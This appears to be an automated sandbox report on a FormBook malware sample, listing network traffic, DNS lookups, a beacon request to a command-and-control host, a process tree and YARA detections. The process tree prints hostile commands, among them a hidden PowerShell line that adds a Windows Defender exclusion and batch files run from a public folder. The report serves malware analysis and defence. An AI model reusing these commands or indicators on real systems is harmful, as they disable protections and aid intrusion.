                                                                        Language of compilation system  Country where language is spoken  Map
                                                                        English                         United States
                                                                        Greek                           Greece

                                                                        Network Behavior

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        Timestamp                             Source Port  Dest Port  Source IP       Dest IP
                                                                        May 12, 2021 06:31:55.607753992 CEST  49779        80         192.168.2.4     198.54.117.212
                                                                        May 12, 2021 06:31:55.807626963 CEST  80           49779      198.54.117.212  192.168.2.4
                                                                        May 12, 2021 06:31:55.807984114 CEST  49779        80         192.168.2.4     198.54.117.212
                                                                        May 12, 2021 06:31:55.808212996 CEST  49779        80         192.168.2.4     198.54.117.212
                                                                        May 12, 2021 06:31:56.011090994 CEST  80           49779      198.54.117.212  192.168.2.4
                                                                        May 12, 2021 06:31:56.011116028 CEST  80           49779      198.54.117.212  192.168.2.4

                                                                        UDP Packets

                                                                        May 12, 2021 06:30:51.758012056 CEST5018353192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:51.820226908 CEST53501838.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:52.596374989 CEST6153153192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:52.691994905 CEST53615318.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:53.294857979 CEST4922853192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:53.352027893 CEST53492288.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:53.716151953 CEST5979453192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:53.789351940 CEST53597948.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:54.153831959 CEST5591653192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:54.210972071 CEST53559168.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:55.387531042 CEST5275253192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:55.447463989 CEST53527528.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:56.135437012 CEST6054253192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:56.196213007 CEST53605428.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:57.714561939 CEST6068953192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:57.771917105 CEST53606898.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:58.025538921 CEST6420653192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:58.093370914 CEST53642068.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:59.075752020 CEST5090453192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:59.136749983 CEST53509048.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:59.786062002 CEST5752553192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:59.846402884 CEST53575258.8.8.8192.168.2.4
                                                                        May 12, 2021 06:31:38.969013929 CEST5381453192.168.2.48.8.8.8
                                                                        May 12, 2021 06:31:39.027034044 CEST53538148.8.8.8192.168.2.4
                                                                        May 12, 2021 06:31:40.445482969 CEST5341853192.168.2.48.8.8.8
                                                                        May 12, 2021 06:31:40.512960911 CEST53534188.8.8.8192.168.2.4
                                                                        May 12, 2021 06:31:45.296017885 CEST6283353192.168.2.48.8.8.8
                                                                        May 12, 2021 06:31:45.507781982 CEST53628338.8.8.8192.168.2.4
                                                                        May 12, 2021 06:31:55.542121887 CEST5926053192.168.2.48.8.8.8
                                                                        May 12, 2021 06:31:55.602200031 CEST53592608.8.8.8192.168.2.4
                                                                        May 12, 2021 06:32:01.389158964 CEST4994453192.168.2.48.8.8.8
                                                                        May 12, 2021 06:32:01.675105095 CEST53499448.8.8.8192.168.2.4

                                                                        DNS Queries

                                                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                        May 12, 2021 06:29:57.944706917 CEST | 192.168.2.4 | 8.8.8.8 | 0x3f8a | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
                                                                        May 12, 2021 06:29:58.782980919 CEST | 192.168.2.4 | 8.8.8.8 | 0xa3ad | Standard query (0) | xhtfga.dm.files.1drv.com | A (IP address) | IN (0x0001)
                                                                        May 12, 2021 06:30:34.466051102 CEST | 192.168.2.4 | 8.8.8.8 | 0x5ab7 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
                                                                        May 12, 2021 06:30:35.224865913 CEST | 192.168.2.4 | 8.8.8.8 | 0x3e0e | Standard query (0) | xhtfga.dm.files.1drv.com | A (IP address) | IN (0x0001)
                                                                        May 12, 2021 06:30:42.116556883 CEST | 192.168.2.4 | 8.8.8.8 | 0x3ac6 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
                                                                        May 12, 2021 06:30:42.737309933 CEST | 192.168.2.4 | 8.8.8.8 | 0x8937 | Standard query (0) | xhtfga.dm.files.1drv.com | A (IP address) | IN (0x0001)
                                                                        May 12, 2021 06:31:45.296017885 CEST | 192.168.2.4 | 8.8.8.8 | 0xbd42 | Standard query (0) | www.thrg33.club | A (IP address) | IN (0x0001)
                                                                        May 12, 2021 06:31:55.542121887 CEST | 192.168.2.4 | 8.8.8.8 | 0x3d1a | Standard query (0) | www.georgeswebwerks.com | A (IP address) | IN (0x0001)
                                                                        May 12, 2021 06:32:01.389158964 CEST | 192.168.2.4 | 8.8.8.8 | 0x70e6 | Standard query (0) | www.rest-blog.com | A (IP address) | IN (0x0001)

                                                                        DNS Answers

                                                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                        May 12, 2021 06:29:58.004832983 CEST | 8.8.8.8 | 192.168.2.4 | 0x3f8a | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | - | CNAME (Canonical name) | IN (0x0001)
                                                                        May 12, 2021 06:29:58.856905937 CEST | 8.8.8.8 | 192.168.2.4 | 0xa3ad | No error (0) | xhtfga.dm.files.1drv.com | dm-files.fe.1drv.com | - | CNAME (Canonical name) | IN (0x0001)
                                                                        May 12, 2021 06:29:58.856905937 CEST | 8.8.8.8 | 192.168.2.4 | 0xa3ad | No error (0) | dm-files.fe.1drv.com | odc-dm-files-geo.onedrive.akadns.net | - | CNAME (Canonical name) | IN (0x0001)
                                                                        May 12, 2021 06:30:34.523298979 CEST | 8.8.8.8 | 192.168.2.4 | 0x5ab7 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | - | CNAME (Canonical name) | IN (0x0001)
                                                                        May 12, 2021 06:30:35.345573902 CEST | 8.8.8.8 | 192.168.2.4 | 0x3e0e | No error (0) | xhtfga.dm.files.1drv.com | dm-files.fe.1drv.com | - | CNAME (Canonical name) | IN (0x0001)
                                                                        May 12, 2021 06:30:35.345573902 CEST | 8.8.8.8 | 192.168.2.4 | 0x3e0e | No error (0) | dm-files.fe.1drv.com | odc-dm-files-geo.onedrive.akadns.net | - | CNAME (Canonical name) | IN (0x0001)
                                                                        May 12, 2021 06:30:42.173862934 CEST | 8.8.8.8 | 192.168.2.4 | 0x3ac6 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | - | CNAME (Canonical name) | IN (0x0001)
                                                                        May 12, 2021 06:30:42.794504881 CEST | 8.8.8.8 | 192.168.2.4 | 0x8937 | No error (0) | xhtfga.dm.files.1drv.com | dm-files.fe.1drv.com | - | CNAME (Canonical name) | IN (0x0001)
                                                                        May 12, 2021 06:30:42.794504881 CEST | 8.8.8.8 | 192.168.2.4 | 0x8937 | No error (0) | dm-files.fe.1drv.com | odc-dm-files-geo.onedrive.akadns.net | - | CNAME (Canonical name) | IN (0x0001)
                                                                        May 12, 2021 06:31:55.602200031 CEST | 8.8.8.8 | 192.168.2.4 | 0x3d1a | No error (0) | www.georgeswebwerks.com | parkingpage.namecheap.com | - | CNAME (Canonical name) | IN (0x0001)
                                                                        May 12, 2021 06:31:55.602200031 CEST | 8.8.8.8 | 192.168.2.4 | 0x3d1a | No error (0) | parkingpage.namecheap.com | - | 198.54.117.212 | A (IP address) | IN (0x0001)
                                                                        May 12, 2021 06:31:55.602200031 CEST | 8.8.8.8 | 192.168.2.4 | 0x3d1a | No error (0) | parkingpage.namecheap.com | - | 198.54.117.215 | A (IP address) | IN (0x0001)
                                                                        May 12, 2021 06:31:55.602200031 CEST | 8.8.8.8 | 192.168.2.4 | 0x3d1a | No error (0) | parkingpage.namecheap.com | - | 198.54.117.218 | A (IP address) | IN (0x0001)
                                                                        May 12, 2021 06:31:55.602200031 CEST | 8.8.8.8 | 192.168.2.4 | 0x3d1a | No error (0) | parkingpage.namecheap.com | - | 198.54.117.217 | A (IP address) | IN (0x0001)
                                                                        May 12, 2021 06:31:55.602200031 CEST | 8.8.8.8 | 192.168.2.4 | 0x3d1a | No error (0) | parkingpage.namecheap.com | - | 198.54.117.211 | A (IP address) | IN (0x0001)
                                                                        May 12, 2021 06:31:55.602200031 CEST | 8.8.8.8 | 192.168.2.4 | 0x3d1a | No error (0) | parkingpage.namecheap.com | - | 198.54.117.210 | A (IP address) | IN (0x0001)
                                                                        May 12, 2021 06:31:55.602200031 CEST | 8.8.8.8 | 192.168.2.4 | 0x3d1a | No error (0) | parkingpage.namecheap.com | - | 198.54.117.216 | A (IP address) | IN (0x0001)
                                                                        May 12, 2021 06:32:01.675105095 CEST | 8.8.8.8 | 192.168.2.4 | 0x70e6 | No error (0) | www.rest-blog.com | - | 118.27.99.91 | A (IP address) | IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • www.georgeswebwerks.com

                                                                        HTTP Packets

                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        0 | 192.168.2.4 | 49779 | 198.54.117.212 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        May 12, 2021 06:31:55.808212996 CEST | 8204 | OUT | GET /qku9/?6lPDSJPH=4N2BxPNrndQhx4f7lxE8pKNuaIuSTDwEioPJ3Oup1sIb+BTUhD7Z9dt/VxNIQWQk9DQP&u8eTH=YdsPJP HTTP/1.1
                                                                        Host: www.georgeswebwerks.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:


                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        System Behavior

                                                                        General

                                                                        Start time:06:29:54
                                                                        Start date:12/05/2021
                                                                        Path:C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe'
                                                                        Imagebase:0x400000
                                                                        File size:721408 bytes
                                                                        MD5 hash:4E71F90D1817F44313F4E101EF393968
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Borland Delphi
                                                                        Yara matches:
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681744195.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680695317.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680995557.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680590350.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680350085.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681371824.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681401941.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680945161.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681291309.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680731974.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681518622.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681644403.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680558315.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680395573.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681105272.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680649667.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680465750.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680834429.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681184778.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680869212.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681329626.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680618860.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681146145.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680798955.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681439102.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681062128.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680427643.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680522649.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681564607.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681236193.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681840426.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680764371.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680899857.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        Reputation:low

                                                                        General

                                                                        Start time:06:30:15
                                                                        Start date:12/05/2021
                                                                        Path:C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        Imagebase:0x400000
                                                                        File size:721408 bytes
                                                                        MD5 hash:4E71F90D1817F44313F4E101EF393968
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:06:30:16
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\stt.bat' '
                                                                        Imagebase:0x11d0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:06:30:16
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff724c50000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

General

Start time: 06:30:17
Start date: 12/05/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /K C:\Users\Public\PXOR.bat
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 06:30:17
Start date: 12/05/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 06:30:17
Start date: 12/05/2021
Path: C:\Windows \System32\Netplwiz.exe
Wow64 process (32bit): false
Commandline: C:\Windows \System32\Netplwiz.exe
Imagebase: 0x7ff61ad30000
File size: 40448 bytes
MD5 hash: F94B7FB6DAC49844D03C7087B2D8B472
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 06:30:18
Start date: 12/05/2021
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Cdex.bat
Imagebase: 0x7ff622070000
File size: 273920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 06:30:18
Start date: 12/05/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 06:30:19
Start date: 12/05/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''
Imagebase: 0x7ff7bedd0000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 06:30:20
Start date: 12/05/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 06:30:28
Start date: 12/05/2021
Path: C:\Users\Public\Citvon\Citvon.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\Citvon\Citvon.exe'
Imagebase: 0x400000
File size: 721408 bytes
MD5 hash: 4E71F90D1817F44313F4E101EF393968
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776445202.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.777072659.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775505378.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776207302.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.777194566.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775598772.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776689752.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775112888.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776879141.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776094630.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.774258125.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775315084.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775824853.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.777314398.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775903098.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775665097.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.774536260.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.774973034.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.774813034.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775978278.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776284853.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776822633.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775198521.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776766122.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775748652.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
• Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775417344.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
